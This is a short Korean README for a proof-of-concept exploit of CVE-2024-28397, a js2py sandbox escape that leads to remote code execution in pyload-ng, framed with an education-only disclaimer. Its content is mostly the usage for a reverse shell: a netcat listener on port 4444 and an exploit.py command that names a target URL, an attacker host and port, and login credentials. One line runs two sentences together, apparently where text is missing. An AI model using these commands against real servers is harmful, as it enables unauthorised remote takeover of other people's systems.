
CVE-2024-28397 PoC 익스플로잇 – js2py 샌드박스 탈출을 통한 pyload-ng 원격 코드 실행
이 저장소는 js2py의 안전하지 않은 사용으로 인해 pyload-ng에 영향을 미치는 원격 코드 실행 취약점인 CVE-2024-28397에 대한 개념 증명(PoC) 익스플로잇을 포함하고 있습니다.
면책 조항:
이 PoC는 교육 및 연구 목적으로만 제공됩니다.
소유하지 않거나 테스트할 명시적 권한이 없는 시스템에는 사용하지 마십시오.
저자는 이 코드의 어떠한 오용에 대해서도 책임지지 않습니다.
pyload-ng 내 js2py리버스 셸을 받으려면 Python 3.x, requests 라이브러리, 그리고 netcat이 필요합니다.
nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123